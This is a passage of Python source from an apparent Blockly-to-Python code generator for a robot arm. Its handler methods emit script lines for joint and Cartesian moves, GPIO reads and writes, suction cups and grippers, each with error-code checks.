self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_circle(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
# percent = self.get_nodes('field', root=values[2], descendant=True)[0].text
# percent = round(float(percent) / 360 * 100, 2)
# wait = self.get_nodes('field', root=values[3], descendant=True)[0].text == 'TRUE'
percent = self.__get_block_val(values[2], arg_map=arg_map)
wait = self.__get_block_val(values[3], arg_map=arg_map)
if wait == 'TRUE' or wait == 'FALSE':
wait = wait == 'TRUE'
p1_block = self.get_node('block', root=values[0])
fields = self.get_nodes('field', root=p1_block)
pose1 = []
for field in fields:
pose1.append(float(field.text))
p2_block = self.get_node('block', root=values[1])
fields = self.get_nodes('field', root=p2_block)
pose2 = []
for field in fields:
pose2.append(float(field.text))
if self._show_comment:
self._append_to_file('{}# move circle and {}'.format(
prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.move_circle({}, {}, float({}) / 360 * 100, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, pose1, pose2, percent, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'move_circle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_7(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
radius_fields = self.get_nodes('field', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_tool_line(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move tool line and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tool_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tool_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius_fields = self.get_nodes('value', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
values = '[{}]'.format(','.join(values))
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius = values.pop()
values = '[{}]'.format(','.join(values))
if self._show_comment:
try:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
except:
pass
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_motion_set_state(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
state = fields[0].text
if self._show_comment:
self._append_to_file('{}# set state'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_state({})'.format(prefix, state))
def _handle_motion_stop(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# emergency stop'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.emergency_stop()'.format(prefix))
def _handle_studio_run_traj(self, block, prefix='', arg_map=None):
filename = self.get_node('field', root=block).text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True)'.format(prefix, times, filename))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_app_studio_traj(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
filename = fields[0].text
speed = fields[1].text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True, double_speed={})'.format(prefix, times, filename, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_tool_message(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = json.dumps(fields[-1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[-1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, message))
# self._append_to_file('{}print(\'{{}}\'.format(\'{}\'))'.format(prefix, message))
def _handle_tool_console(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = json.dumps(fields[1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, msg))
def _handle_tool_console_with_variable(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = fields[1].text
# msg = json.dumps(fields[1].text, ensure_ascii=False)
value = self.get_node('value', block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}value = {}'.format(prefix, expression))
prefix = self.__check_is_quit(prefix)
if msg:
self._append_to_file('{}print({}.format({}))'.format(prefix, json.dumps(msg+'{}', ensure_ascii=False), expression))
# self._append_to_file('{}pprint(\'{}{{}}\'.format({}))'.format(prefix, msg, expression))
else:
self._append_to_file('{}print(\'{{}}\'.format({}))'.format(prefix, expression))
def _handle_wait(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} time.sleep({})'.format(prefix, value))
def _handle_gpio_get_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_get_suction_cup(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# get suction cup status'.format(prefix))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_suction_cup()'.format(prefix))
def _handle_check_air_pump_state(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check air pump state'.format(prefix))
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_air_pump_state({}, timeout={})'.format(prefix, state, timeout))
def _handle_check_bio_gripper_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check bio gripper is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_bio_gripper_is_catch(timeout={})'.format(prefix, timeout))
def _handle_check_robotiq_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check robotiq is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_robotiq_is_catch(timeout={})'.format(prefix, timeout))
def _handle_set_suction_cup(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='trigger')
on = True if fields[0].text == 'ON' else False
fields = self.get_nodes('field', root=block, name='wait')
if fields and len(fields) > 0:
wait = fields[0].text == 'TRUE'
else:
wait = False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_suction_cup, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_get_controller_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_digital_di(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_controller_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = fields[5].text
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} analog with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog({}, {})'.format(prefix, io, value))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog, code={{}}\'.format(code))'.format(prefix))
def _handle_set_collision_sensitivity(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_collision_sensitivity({})'.format(prefix, value))
def _handle_set_teach_sensitivity(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_teach_sensitivity({})'.format(prefix, value))
def _handle_set_tcp_load(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
weight = fields[1].text
x = fields[2].text
y = fields[3].text
z = fields[4].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{} arm.set_state(0)'.format(prefix))
# self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# weight = self.get_nodes('field', root=values[0], descendant=True)[0].text
# x = self.get_nodes('field', root=values[1], descendant=True)[0].text
# y = self.get_nodes('field', root=values[2], descendant=True)[0].text
# z = self.get_nodes('field', root=values[3], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_gravity_direction(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
x = self.get_nodes('field', root=values[0], descendant=True)[0].text
y = self.get_nodes('field', root=values[1], descendant=True)[0].text
z = self.get_nodes('field', root=values[2], descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_gravity_direction([{}, {}, {}])'.format(prefix, x, y, z))
def _handle_set_tcp_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_offset([{}, {}, {}, {}, {}, {}], wait=True)'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# x = self.get_nodes('field', root=values[0], descendant=True)[0].text
# y = self.get_nodes('field', root=values[1], descendant=True)[0].text
# z = self.get_nodes('field', root=values[2], descendant=True)[0].text
# roll = self.get_nodes('field', root=values[3], descendant=True)[0].text
# pitch = self.get_nodes('field', root=values[4], descendant=True)[0].text
# yaw = self.get_nodes('field', root=values[5], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_world_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_world_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
def _handle_gripper_set(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
if fields is not None and len(fields) >= 3:
pos = fields[0].text
speed = fields[1].text
wait = fields[2].text == 'TRUE'
else:
values = self.get_nodes('value', root=block)
pos = self.get_nodes('field', root=values[0], descendant=True)[0].text
speed = self.get_nodes('field', root=values[1], descendant=True)[0].text
wait = self.get_nodes('field', root=values[2], descendant=True)[0].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# set gripper position and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_gripper_position({}, wait={}, speed={}, auto_enable=True)'.format(prefix, pos, wait, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_position, code={{}}\'.format(code))'.format(prefix))
def _handle_gripper_set_status(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
status = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
if self._show_comment:
self._append_to_file('{}# set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm._arm.set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_status, code={{}}\'.format(code))'.format(prefix))
def _handle_set_bio_gripper_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_bio_gripper_enable, code={{}}\'.format(code))'.format(prefix))
# self._append_to_file('{}expired = time.time() + 2'.format(prefix))
# self._append_to_file('{}while not params[\'quit\'] and time.time() < expired:'.format(prefix))
# self._append_to_file('{} time.sleep(0.1)'.format(prefix))
def _handle_set_bio_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
on = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if on:
if self._show_comment:
self._append_to_file('{}# open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'open_bio_gripper, code={{}}\'.format(code))'.format(prefix))
else:
if self._show_comment:
self._append_to_file('{}# close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'close_bio_gripper, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_robotiq_init()'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_reset()'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_reset, code={{}}\'.format(code))'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_activate(wait=True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_activate, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='pos')
pos = int(fields[0].text)
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='force')
force = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if self._show_comment:
self._append_to_file('{}# robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_position, code={{}}\'.format(code))'.format(prefix))
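# Shared helper for the GPIO event handlers below: it registers a callback entry in the
# generated script and, the first time it is used, injects an EventGPIOThread class that
# polls tool/controller GPIO state and dispatches the registered callbacks.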
